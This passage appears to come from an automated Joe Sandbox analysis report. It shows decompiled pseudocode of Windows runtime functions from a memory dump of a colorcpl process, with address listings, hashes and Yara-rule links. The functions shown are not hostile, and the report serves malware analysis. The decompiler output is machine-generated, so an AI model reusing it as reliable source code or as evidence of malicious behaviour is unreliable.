				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x6f085ec;
				E06E32280(_t48, 0x6f085ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E06E2FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x6f0538c; // 0xe5c1d0
					if( *_t84 != 0x6f05388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x6eef6e8);
						E06E6D0E8(0x6f085ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E06EE88F5(_t80, _t85, 0x6f05388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x6f086c0; // 0xe207b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x6f086b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E06E32280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E06EE88F5(0x6f085ec, _t85, 0x6f05388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E06E5AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x6f0b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x6f084c0;
																			if(_t82 >=  *0x6f084c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E06EE9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E06E1922A(_t99);
										_t64 = E06E37D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E06EE8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x6f086c0; // 0xe207b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x6f086b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x6f086bc;
													_t87 = 0x6f086b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E06E19240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x6f086c4;
												_t87 = 0x6f086c0;
												L27:
												E06E49B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E06E6D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x6f05388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x6f0538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                0x06e19082
                                                                                                0x06e19083
                                                                                                0x06e19084
                                                                                                0x06e19085
                                                                                                0x06e19087
                                                                                                0x06e19096
                                                                                                0x06e19098
                                                                                                0x06e19098
                                                                                                0x06e1909e
                                                                                                0x06e190a8
                                                                                                0x06e190e7
                                                                                                0x06e190e7
                                                                                                0x06e190aa
                                                                                                0x06e190b0
                                                                                                0x06e190b7
                                                                                                0x06e190bd
                                                                                                0x06e190dd
                                                                                                0x06e190e6
                                                                                                0x06e190bf
                                                                                                0x06e190bf
                                                                                                0x06e190c7
                                                                                                0x06e190cf
                                                                                                0x06e190f1
                                                                                                0x06e190f2
                                                                                                0x06e190f4
                                                                                                0x06e190f5
                                                                                                0x06e190f6
                                                                                                0x06e190f7
                                                                                                0x06e190f8
                                                                                                0x06e190f9
                                                                                                0x06e190fa
                                                                                                0x06e190fb
                                                                                                0x06e190fc
                                                                                                0x06e190fd
                                                                                                0x06e190fe
                                                                                                0x06e190ff
                                                                                                0x06e19100
                                                                                                0x06e19102
                                                                                                0x06e19107
                                                                                                0x06e1910c
                                                                                                0x06e19110
                                                                                                0x06e19113
                                                                                                0x06e19115
                                                                                                0x06e19136
                                                                                                0x06e1913f
                                                                                                0x06e19143
                                                                                                0x06e737e4
                                                                                                0x06e737e4
                                                                                                0x06e19117
                                                                                                0x06e19117
                                                                                                0x06e1911d
                                                                                                0x00000000
                                                                                                0x06e1911f
                                                                                                0x06e1911f
                                                                                                0x06e19125
                                                                                                0x00000000
                                                                                                0x06e19127
                                                                                                0x06e1912d
                                                                                                0x06e19130
                                                                                                0x06e19134
                                                                                                0x06e19158
                                                                                                0x06e1915d
                                                                                                0x06e19161
                                                                                                0x06e19168
                                                                                                0x06e73715
                                                                                                0x06e1916e
                                                                                                0x06e1916e
                                                                                                0x06e19175
                                                                                                0x06e19177
                                                                                                0x06e1917e
                                                                                                0x06e1917f
                                                                                                0x06e19182
                                                                                                0x06e19182
                                                                                                0x06e19187
                                                                                                0x06e19187
                                                                                                0x06e1918a
                                                                                                0x06e1918d
                                                                                                0x06e1918f
                                                                                                0x06e19192
                                                                                                0x06e19195
                                                                                                0x06e19198
                                                                                                0x06e19198
                                                                                                0x06e19198
                                                                                                0x06e1919a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7371f
                                                                                                0x06e73721
                                                                                                0x06e73727
                                                                                                0x06e7372f
                                                                                                0x06e73733
                                                                                                0x06e73735
                                                                                                0x06e73738
                                                                                                0x06e7373b
                                                                                                0x06e7373d
                                                                                                0x06e73740
                                                                                                0x00000000
                                                                                                0x06e73746
                                                                                                0x06e73746
                                                                                                0x06e73749
                                                                                                0x00000000
                                                                                                0x06e7374f
                                                                                                0x06e7374f
                                                                                                0x06e73751
                                                                                                0x06e73757
                                                                                                0x06e73759
                                                                                                0x06e7375c
                                                                                                0x06e7375c
                                                                                                0x06e7375e
                                                                                                0x06e7375e
                                                                                                0x06e73761
                                                                                                0x06e73764
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e73766
                                                                                                0x06e73768
                                                                                                0x06e737a3
                                                                                                0x06e737a3
                                                                                                0x06e737a5
                                                                                                0x06e737a7
                                                                                                0x06e737ad
                                                                                                0x06e737b0
                                                                                                0x06e737b2
                                                                                                0x06e737bc
                                                                                                0x06e737c2
                                                                                                0x06e737c2
                                                                                                0x06e737b2
                                                                                                0x06e19187
                                                                                                0x06e19187
                                                                                                0x06e1918a
                                                                                                0x06e1918d
                                                                                                0x06e1918f
                                                                                                0x06e19192
                                                                                                0x06e19195
                                                                                                0x00000000
                                                                                                0x06e19195
                                                                                                0x00000000
                                                                                                0x06e7376a
                                                                                                0x06e7376a
                                                                                                0x06e7376a
                                                                                                0x06e7376c
                                                                                                0x06e7376c
                                                                                                0x06e7376f
                                                                                                0x06e73775
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e73777
                                                                                                0x06e73779
                                                                                                0x06e73782
                                                                                                0x06e73787
                                                                                                0x06e73789
                                                                                                0x06e73790
                                                                                                0x06e73790
                                                                                                0x06e7378b
                                                                                                0x06e7378b
                                                                                                0x06e7378b
                                                                                                0x06e73792
                                                                                                0x06e73795
                                                                                                0x00000000
                                                                                                0x06e73795
                                                                                                0x00000000
                                                                                                0x06e73779
                                                                                                0x06e73798
                                                                                                0x00000000
                                                                                                0x06e73798
                                                                                                0x00000000
                                                                                                0x06e73768
                                                                                                0x06e7379b
                                                                                                0x06e7379b
                                                                                                0x06e73751
                                                                                                0x06e73749
                                                                                                0x00000000
                                                                                                0x06e73740
                                                                                                0x06e191a0
                                                                                                0x06e191a3
                                                                                                0x06e191a9
                                                                                                0x06e191b0
                                                                                                0x00000000
                                                                                                0x06e191b0
                                                                                                0x06e19187
                                                                                                0x06e191b4
                                                                                                0x06e191b4
                                                                                                0x06e191bb
                                                                                                0x06e191c0
                                                                                                0x06e191c5
                                                                                                0x06e191c7
                                                                                                0x06e737da
                                                                                                0x06e191cd
                                                                                                0x06e191cd
                                                                                                0x06e191cd
                                                                                                0x06e191d2
                                                                                                0x06e191d5
                                                                                                0x06e19239
                                                                                                0x06e19239
                                                                                                0x06e191d7
                                                                                                0x06e191db
                                                                                                0x06e191e1
                                                                                                0x06e191e7
                                                                                                0x06e191fd
                                                                                                0x06e19203
                                                                                                0x06e1921e
                                                                                                0x06e19223
                                                                                                0x00000000
                                                                                                0x06e19205
                                                                                                0x06e19205
                                                                                                0x06e19208
                                                                                                0x06e1920c
                                                                                                0x06e19214
                                                                                                0x06e19214
                                                                                                0x06e1920c
                                                                                                0x06e191e9
                                                                                                0x06e191e9
                                                                                                0x06e191ee
                                                                                                0x06e191f3
                                                                                                0x06e191f3
                                                                                                0x06e191f3
                                                                                                0x06e191e7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e19134
                                                                                                0x06e19125
                                                                                                0x06e1911d
                                                                                                0x06e1914e
                                                                                                0x06e190d1
                                                                                                0x06e190d1
                                                                                                0x06e190d3
                                                                                                0x06e190d6
                                                                                                0x06e190d8
                                                                                                0x00000000
                                                                                                0x06e190d8
                                                                                                0x06e190cf

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf7aed04235853f26057921434521273f6353ea5573f3126da1f08153c89f295
                                                                                                • Instruction ID: 156d305303ca8a99803d4ede907530d8605c12ab3460c7fc599edc307dab10b7
                                                                                                • Opcode Fuzzy Hash: bf7aed04235853f26057921434521273f6353ea5573f3126da1f08153c89f295
                                                                                                • Instruction Fuzzy Hash: C901F4729113048FE3948F18DD40B2277BAFB45324F216026E2168F692D3B1DC41DFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE4015 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E06EE4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E06E32280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E06E32280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x6f086ac);
					E06E1F900(0x6f086d4, _t28);
					E06E2FFB0(0x6f086ac, _t28, 0x6f086ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E06E2FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                                0x06ee401a
                                                                                                0x06ee401e
                                                                                                0x06ee4023
                                                                                                0x06ee4028
                                                                                                0x06ee4029
                                                                                                0x06ee402b
                                                                                                0x06ee402f
                                                                                                0x06ee4043
                                                                                                0x06ee4046
                                                                                                0x06ee4051
                                                                                                0x06ee4057
                                                                                                0x06ee405f
                                                                                                0x06ee4062
                                                                                                0x06ee4067
                                                                                                0x06ee406f
                                                                                                0x06ee407c
                                                                                                0x06ee407c
                                                                                                0x06ee408c
                                                                                                0x06ee408c
                                                                                                0x06ee4097

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ebc12dce3b42224456ec01c5721e093de6b7f62ae58a5c65c3705badd1f4ff91
                                                                                                • Instruction ID: 3028157ea6d46c79f868405ddd8816a53dd3423bd6dff3db14ae08967f51ff55
                                                                                                • Opcode Fuzzy Hash: ebc12dce3b42224456ec01c5721e093de6b7f62ae58a5c65c3705badd1f4ff91
                                                                                                • Instruction Fuzzy Hash: 3701DF72641B55BFD6D0AB69CE84E13B7ACFF49660B001225B62883A51DB24EC11CAE4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED14FB Relevance: .0, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 61%
                                                                                                			E06ED14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x6f0d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E06E5FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E06E37D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                0x06ed14fb
                                                                                                0x06ed14fb
                                                                                                0x06ed150a
                                                                                                0x06ed1514
                                                                                                0x06ed1519
                                                                                                0x06ed151b
                                                                                                0x06ed1526
                                                                                                0x06ed152c
                                                                                                0x06ed1534
                                                                                                0x06ed1537
                                                                                                0x06ed153a
                                                                                                0x06ed1545
                                                                                                0x06ed1557
                                                                                                0x06ed1547
                                                                                                0x06ed1550
                                                                                                0x06ed1550
                                                                                                0x06ed1562
                                                                                                0x06ed1563
                                                                                                0x06ed1565
                                                                                                0x06ed156a
                                                                                                0x06ed157f

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: be76cab25bb7e049b0889229d958b619279a0fc313cc1bd03a9a2db06833bdb1
                                                                                                • Instruction ID: 2eed1bc6ec0d638c68e279eb07244bd9488b6ed5ec046ac9aa95de1936637281
                                                                                                • Opcode Fuzzy Hash: be76cab25bb7e049b0889229d958b619279a0fc313cc1bd03a9a2db06833bdb1
                                                                                                • Instruction Fuzzy Hash: D0018C71A00358AFDB44DFA8D846EAEBBB8EF44710F404066B914EB281DA74DA01CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED138A Relevance: .0, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 61%
                                                                                                			E06ED138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x6f0d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E06E5FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E06E37D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                0x06ed138a
                                                                                                0x06ed138a
                                                                                                0x06ed1399
                                                                                                0x06ed13a3
                                                                                                0x06ed13a8
                                                                                                0x06ed13aa
                                                                                                0x06ed13b5
                                                                                                0x06ed13bb
                                                                                                0x06ed13c3
                                                                                                0x06ed13c6
                                                                                                0x06ed13c9
                                                                                                0x06ed13d4
                                                                                                0x06ed13e6
                                                                                                0x06ed13d6
                                                                                                0x06ed13df
                                                                                                0x06ed13df
                                                                                                0x06ed13f1
                                                                                                0x06ed13f2
                                                                                                0x06ed13f4
                                                                                                0x06ed13f9
                                                                                                0x06ed140e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4fb7e2f0249cdcd845ba9be780f00bf559e55303216cd805499438bdb6e826ea
                                                                                                • Instruction ID: 2ee6751e0c6861b2a4d6ddedc5f4399069e8ae2c00c02e202c5a500bbb47b556
                                                                                                • Opcode Fuzzy Hash: 4fb7e2f0249cdcd845ba9be780f00bf559e55303216cd805499438bdb6e826ea
                                                                                                • Instruction Fuzzy Hash: 99019E71E0431CAFDB44DFA8D886EAEBBB8EF44710F014066B914EB281DA70DA01CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E158EC Relevance: .0, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 91%
                                                                                                			E06E158EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x6f0d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x6df5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E06E15943() != 0 &&  *0x6f05320 > 5) {
					E06E97B5E( &_v44, _t27);
					_t22 =  &_v28;
					E06E97B5E( &_v28, _t28);
					_t11 = E06E97B9C(0x6f05320, 0x6dfbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E06E5B640(_t11, _t17, _v8 ^ _t29, 0x6dfbf15, _t27, _t28);
			}















                                                                                                0x06e158fb
                                                                                                0x06e158fe
                                                                                                0x06e15906
                                                                                                0x06e1590a
                                                                                                0x06e1593c
                                                                                                0x06e1593c
                                                                                                0x06e1590c
                                                                                                0x06e1590c
                                                                                                0x06e15911
                                                                                                0x00000000
                                                                                                0x06e15913
                                                                                                0x06e15913
                                                                                                0x06e15913
                                                                                                0x06e15911
                                                                                                0x06e1591d
                                                                                                0x06e71035
                                                                                                0x06e7103c
                                                                                                0x06e7103f
                                                                                                0x06e71056
                                                                                                0x06e71056
                                                                                                0x06e1593b

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ec9100b97e91302ea8f64b2d90e0b16b6e44276f2146423491d00dfa73bd598f
                                                                                                • Instruction ID: 95803cfd4cd80659452eacc78828bc2497e88cfa1105cf0f488a867ae107cc76
                                                                                                • Opcode Fuzzy Hash: ec9100b97e91302ea8f64b2d90e0b16b6e44276f2146423491d00dfa73bd598f
                                                                                                • Instruction Fuzzy Hash: 8C0142B1A203089BDBC4EB79CC209AE73BEEF84130F45106999229B284EE30DD05D692
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ECFEC0 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E06ECFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x6f0d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E06E5FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E06E37D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                0x06ecfec0
                                                                                                0x06ecfec0
                                                                                                0x06ecfecf
                                                                                                0x06ecfed9
                                                                                                0x06ecfede
                                                                                                0x06ecfee0
                                                                                                0x06ecfeeb
                                                                                                0x06ecfef3
                                                                                                0x06ecfef6
                                                                                                0x06ecfef9
                                                                                                0x06ecff04
                                                                                                0x06ecff16
                                                                                                0x06ecff06
                                                                                                0x06ecff0f
                                                                                                0x06ecff0f
                                                                                                0x06ecff21
                                                                                                0x06ecff22
                                                                                                0x06ecff24
                                                                                                0x06ecff29
                                                                                                0x06ecff3e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 014288b2fa8baa3502d7c978cabeb9765e259ad9eedf0c5abbcf7ff168b8b3a5
                                                                                                • Instruction ID: 67a2334da1abb53a2cda63383161cc5cd1c0a80ab43597d9fd688678a487d3f1
                                                                                                • Opcode Fuzzy Hash: 014288b2fa8baa3502d7c978cabeb9765e259ad9eedf0c5abbcf7ff168b8b3a5
                                                                                                • Instruction Fuzzy Hash: AE018471E0035CAFDB54DBA9D845FAEB7BCEF45710F40406AB910AB291DA70DA01CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ECFE3F Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E06ECFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x6f0d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E06E5FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E06E37D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                0x06ecfe3f
                                                                                                0x06ecfe3f
